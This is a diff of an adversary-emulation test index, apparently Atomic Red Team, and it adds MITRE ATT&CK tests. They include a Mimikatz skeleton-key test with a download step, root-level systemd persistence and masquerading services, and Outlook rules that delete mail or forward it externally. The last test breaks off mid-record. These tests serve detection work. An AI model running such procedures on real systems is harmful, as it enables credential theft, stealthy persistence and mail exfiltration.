+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
   T1027.006:
     technique:
       type: attack-pattern
@@ -52548,7 +52597,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -52571,7 +52620,586 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
-    atomic_tests: []
+      identifier: T1569.003
+    atomic_tests:
+    - name: Create and Enable a Malicious systemd Service Unit
+      auto_generated_guid: e58c8723-5503-4533-b642-535cd20ec648
+      description: |
+        Creates a new systemd service unit file in /etc/systemd/system/ and enables it using
+        systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow
+        to establish persistence or execute arbitrary commands under the context of systemd.
+
+        This simulates the full attacker workflow: writing the unit file, reloading the systemd
+        daemon, enabling the service to survive reboots, and starting it immediately. This is
+        consistent with techniques observed in ransomware precursor activity and post-exploitation
+        frameworks targeting Linux infrastructure.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_name:
+          description: Name of the malicious service to create
+          type: string
+          default: atomic-test
+        command_to_run:
+          description: Command the service will execute
+          type: string
+          default: /bin/bash -c "echo atomictest > /tmp/atomic_service_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      - description: "/etc/systemd/system/ directory must exist and be writable\n"
+        prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
+          ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable.
+          Ensure systemd is installed."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+          echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
+          echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+          echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
+          echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+          echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          systemctl enable #{service_name}.service
+          systemctl start #{service_name}.service
+          systemctl status #{service_name}.service
+        cleanup_command: |
+          systemctl stop #{service_name}.service 2>/dev/null || true
+          systemctl disable #{service_name}.service 2>/dev/null || true
+          rm -f /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          rm -f /tmp/atomic_service_output.txt
+    - name: Create systemd Service Unit from /tmp (Unusual Location)
+      auto_generated_guid: a1fa406e-2354-4a24-b6d6-94157e7564d4
+      description: |
+        Creates a systemd service unit file in /tmp and loads it using systemctl start with
+        an absolute path. Adversaries may write service unit files to world-writable directories
+        such as /tmp to avoid triggering alerts on new file creation in standard service
+        directories, or to execute payloads transiently without permanently installing a service.
+
+        Loading a service unit from an arbitrary path rather than a standard systemd directory
+        is unusual behaviour that should be detectable by monitoring systemctl command arguments.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_path:
+          description: Full path to the service file to be written in /tmp
+          type: path
+          default: "/tmp/atomic_tmp.service"
+        command_to_run:
+          description: Command the service will execute
+          type: string
+          default: /bin/bash -c "id > /tmp/atomic_tmp_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: "/tmp must exist and be writable\n"
+        prereq_command: 'if [ -d "/tmp" ] && [ -w "/tmp" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "/tmp does not exist or is not writable on this
+          system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > #{service_path}
+          echo "Description=Atomic Tmp Service" >> #{service_path}
+          echo "" >> #{service_path}
+          echo "[Service]" >> #{service_path}
+          echo "ExecStart=#{command_to_run}" >> #{service_path}
+          echo "" >> #{service_path}
+          echo "[Install]" >> #{service_path}
+          echo "WantedBy=multi-user.target" >> #{service_path}
+          systemctl link #{service_path}
+          systemctl start $(basename #{service_path})
+          systemctl status $(basename #{service_path})
+        cleanup_command: |
+          systemctl stop $(basename #{service_path}) 2>/dev/null || true
+          rm -f #{service_path}
+          rm -f /tmp/atomic_tmp_output.txt
+    - name: Create systemd Service Unit from /dev/shm (Unusual Location)
+      auto_generated_guid: dce49381-a26b-4d95-bdfa-c607ffe8bee5
+      description: |
+        Creates a systemd service unit file in /dev/shm and loads it using systemctl.
+        /dev/shm is a memory-backed filesystem that is world-writable on most Linux systems
+        and does not persist across reboots, making it particularly attractive to adversaries
+        seeking to execute transient payloads while evading file-based forensic detection.
+
+        This technique has been observed in post-exploitation scenarios where attackers
+        deliberately avoid writing to disk-backed locations to limit forensic artefacts.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_path:
+          description: Full path to the service file to be written in /dev/shm
+          type: path
+          default: "/dev/shm/atomic_shm.service"
+        command_to_run:
+          description: Command the service will execute
+          type: string
+          default: /bin/bash -c "whoami > /tmp/atomic_shm_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: "/dev/shm must exist and be writable\n"
+        prereq_command: 'if [ -d "/dev/shm" ] && [ -w "/dev/shm" ]; then exit 0; else
+          exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/dev/shm does not exist or is not writable on this
+          system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > #{service_path}
+          echo "Description=Atomic SHM Service" >> #{service_path}
+          echo "" >> #{service_path}
+          echo "[Service]" >> #{service_path}
+          echo "ExecStart=#{command_to_run}" >> #{service_path}
+          echo "" >> #{service_path}
+          echo "[Install]" >> #{service_path}
+          echo "WantedBy=multi-user.target" >> #{service_path}
+          systemctl link #{service_path}
+          systemctl start $(basename #{service_path})
+          systemctl status $(basename #{service_path})
+        cleanup_command: |
+          systemctl stop $(basename #{service_path}) 2>/dev/null || true
+          rm -f #{service_path}
+          rm -f /tmp/atomic_shm_output.txt
+    - name: Modify Existing systemd Service to Execute Malicious Command
+      auto_generated_guid: 6123928f-6389-4914-8d25-a5d69bd657fa
+      description: |
+        Creates a service unit file that initially runs a benign command, then modifies the
+        ExecStart directive using sed to substitute a malicious command before reloading and
+        restarting the service. Adversaries may hijack existing services to blend in with normal
+        service activity and avoid triggering detections focused solely on new service creation.
+
+        This technique reflects the tradecraft observed in more sophisticated intrusions where
+        blending into existing process trees is a priority over creating net-new services.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_name:
+          description: Name of the service to create and then modify for the test
+          type: string
+          default: atomic-modify-test
+        malicious_command:
+          description: Malicious command to substitute into ExecStart
+          type: string
+          default: /bin/bash -c "echo hijacked > /tmp/atomic_hijack_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: 'sed must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v sed)" ]; then exit 0; else exit 1;
+          fi
+
+          '
+        get_prereq_command: 'apt-get install -y sed 2>/dev/null || yum install -y
+          sed 2>/dev/null || echo "Could not install sed automatically."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      - description: "/etc/systemd/system/ directory must exist and be writable\n"
+        prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
+          ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+          echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+          echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+          echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          systemctl start #{service_name}.service
+          systemctl status #{service_name}.service
+        cleanup_command: |
+          systemctl stop #{service_name}.service 2>/dev/null || true
+          systemctl disable #{service_name}.service 2>/dev/null || true
+          rm -f /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          rm -f /tmp/atomic_hijack_output.txt
+    - name: Execute Command via Transient systemd Service (systemd-run)
+      auto_generated_guid: a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
+      description: |
+        Uses systemd-run to execute a command as a transient systemd service without creating
+        a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary
+        commands under the context of systemd while bypassing controls that monitor for new
+        unit file creation, since transient services exist only in memory for their lifetime.
+
+        This is a particularly stealthy technique as it leaves minimal on-disk artefacts and
+        the service disappears from systemctl list-units once execution completes.
+      supported_platforms:
+      - linux
+      input_arguments:
+        unit_name:
+          description: Name of the transient systemd unit to create
+          type: string
+          default: atomic-transient
+        command_to_run:
+          description: Command to execute as a transient service
+          type: string
+          default: /bin/bash -c "id > /tmp/atomic_transient_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemd-run must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
+          exit 1; fi
+
+          '
+        get_prereq_command: 'echo "systemd-run is not available. Ensure systemd is
+          installed and up to date."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          systemd-run --unit=#{unit_name} --wait #{command_to_run}
+          systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
+        cleanup_command: |
+          systemctl stop #{unit_name}.service 2>/dev/null || true
+          rm -f /tmp/atomic_transient_output.txt
+    - name: Enumerate All systemd Services Using systemctl
+      auto_generated_guid: 1e5be8d4-605a-4acb-8709-2f80b2d8ea95
+      description: |
+        Enumerates all systemd services and their current states using systemctl list-units
+        and systemctl list-unit-files. Adversaries may enumerate running and enabled services
+        to identify targets for hijacking, understand the host environment, map installed
+        security tooling, or identify gaps in monitoring coverage.
+
+        Service enumeration is a common reconnaissance step during post-exploitation and may
+        precede service hijacking or masquerading activity. This test does not require
+        elevation as service listing is available to unprivileged users on most Linux systems.
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          systemctl list-units --type=service --all
+          systemctl list-unit-files --type=service
+        cleanup_command: 'echo "No cleanup required"
+
+          '
+    - name: Enable systemd Service for Persistence with Auto-Restart
+      auto_generated_guid: 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7
+      description: |
+        Creates a payload script and a systemd service unit that executes it, then enables
+        the service to survive reboots using systemctl enable. The service is configured with
+        Restart=always to automatically restart on failure, mimicking the persistence mechanism
+        used by adversaries deploying backdoors or beacons on Linux hosts.
+
+        This technique is consistent with observed post-exploitation tradecraft where adversaries
+        establish a foothold that survives reboots and self-heals after interruption, complicating
+        incident response and remediation efforts.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_name:
+          description: Name of the persistence service to create
+          type: string
+          default: atomic-persist
+        payload_path:
+          description: Path to the payload script that the service will execute
+          type: path
+          default: "/tmp/atomic_payload.sh"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      - description: "/etc/systemd/system/ directory must exist and be writable\n"
+        prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
+          ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
+
+          '
+      - description: 'Payload script must exist at the specified path
+
+          '
+        prereq_command: 'if [ -f "#{payload_path}" ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: |
+          echo '#!/bin/bash' > #{payload_path}
+          echo 'echo persistent >> /tmp/atomic_persist_output.txt' >> #{payload_path}
+          chmod +x #{payload_path}
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+          echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
+          echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+          echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
+          echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
+          echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+          echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          systemctl enable #{service_name}.service
+          systemctl start #{service_name}.service
+          systemctl status #{service_name}.service
+        cleanup_command: |
+          systemctl stop #{service_name}.service 2>/dev/null || true
+          systemctl disable #{service_name}.service 2>/dev/null || true
+          rm -f /etc/systemd/system/#{service_name}.service
+          rm -f /etc/systemd/system/multi-user.target.wants/#{service_name}.service
+          systemctl daemon-reload
+          rm -f #{payload_path}
+          rm -f /tmp/atomic_persist_output.txt
+    - name: Masquerade Malicious Service as Legitimate System Service
+      auto_generated_guid: 6fec8560-ff64-4bbf-bc79-734fea48f7ca
+      description: |
+        Creates a systemd service with a name and description closely resembling a legitimate
+        system service to blend in with normal service activity. Adversaries may deliberately
+        choose service names similar to well-known system services such as systemd-networkd,
+        cron, or ssh to evade detection from analysts reviewing service lists or automated
+        alerting on service names.
+
+        This masquerading technique is particularly effective in environments where detection
+        relies on service name allowlists or manual review of systemctl list-units output
+        rather than behavioural analysis of service unit file contents and ExecStart paths.
+      supported_platforms:
+      - linux
+      input_arguments:
+        masquerade_name:
+          description: Service name designed to closely mimic a legitimate system
+            service
+          type: string
+          default: systemd-network-helper
+        command_to_run:
+          description: Command the masquerading service will execute
+          type: string
+          default: /bin/bash -c "echo masquerade > /tmp/atomic_masquerade_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      - description: "/etc/systemd/system/ directory must exist and be writable\n"
+        prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
+          ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
+
+          '
+      - description: 'Chosen masquerade service name must not already exist as a real
+          service
+
+          '
+        prereq_command: 'if ! systemctl list-unit-files --type=service | grep -q "^#{masquerade_name}.service";
+          then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "A service named #{masquerade_name} already exists.
+          Change the masquerade_name input argument to avoid conflicts."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
+          echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
+          systemctl daemon-reload
+          systemctl start #{masquerade_name}.service
+          systemctl status #{masquerade_name}.service
+        cleanup_command: |
+          systemctl stop #{masquerade_name}.service 2>/dev/null || true
+          systemctl disable #{masquerade_name}.service 2>/dev/null || true
+          rm -f /etc/systemd/system/#{masquerade_name}.service
+          systemctl daemon-reload
+          rm -f /tmp/atomic_masquerade_output.txt
   T1059.009:
     technique:
       type: attack-pattern
@@ -61265,7 +61893,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -61286,7 +61914,410 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
-    atomic_tests: []
+      identifier: T1137.005
+    atomic_tests:
+    - name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
+      auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
+      description: |
+        Creates a malicious Outlook rule via the COM object that permanently deletes
+        emails when an email with a specific subject keyword arrives. Simulates
+        adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
+        action as it does not require a resolved Exchange folder unlike MoveToFolder.
+        NOTE: olRuleActionStartApplication cannot be created programmatically per
+        Microsoft's Rules object model - DeletePermanently is used as the supported
+        equivalent that generates the same rule-creation artefact.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the malicious Outlook rule
+          type: string
+          default: AtomicTest_T1137005_SubjectTrigger
+        trigger_subject:
+          description: Email subject keyword that triggers the rule
+          type: string
+          default: atomic-rt-trigger
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $cond = $rule.Conditions.Subject
+          $cond.Enabled = $true
+          $cond.Text    = @("#{trigger_subject}")
+
+          $action         = $rule.Actions.DeletePermanently
+          $action.Enabled = $true
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via
+        COM Object
+      auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
+      description: |
+        Creates an Outlook rule via COM that permanently deletes emails received
+        from a specific sender address. Adversaries use sender-based triggers to
+        make rules appear more legitimate (e.g. disguised as a filter for a
+        specific colleague). Tests a different rule condition path through the
+        COM object model. Uses DeletePermanently as it does not require a resolved
+        Exchange folder unlike MoveToFolder.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the malicious Outlook rule
+          type: string
+          default: AtomicTest_T1137005_SenderTrigger
+        trigger_sender:
+          description: Sender email address that triggers the rule
+          type: string
+          default: atomictest@redteam.local
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $cond = $rule.Conditions.From
+          $cond.Enabled = $true
+          $cond.Recipients.Add("#{trigger_sender}")
+          $cond.Recipients.ResolveAll() | Out-Null
+
+          $action         = $rule.Actions.DeletePermanently
+          $action.Enabled = $true
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
+      auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
+      description: |
+        Creates an Outlook rule that automatically forwards all received emails to
+        an external address. Simulates Business Email Compromise (BEC) and insider
+        threat scenarios where adversaries establish forwarding rules to exfiltrate
+        mail. One of the most commonly observed real-world abuses of Outlook rules.
+        Detected by Exchange mail flow anomalies and Microsoft Secure Score
+        forwarding alerts.
+        NOTE: No actual email is forwarded during this test - the rule is created
+        but a trigger email is not sent. Run cleanup immediately after verification.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the forwarding rule
+          type: string
+          default: AtomicTest_T1137005_ForwardExfil
+        forward_to_address:
+          description: Email address to forward mail to (use a controlled test address)
+          type: string
+          default: atomictest-exfil@redteam.local
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
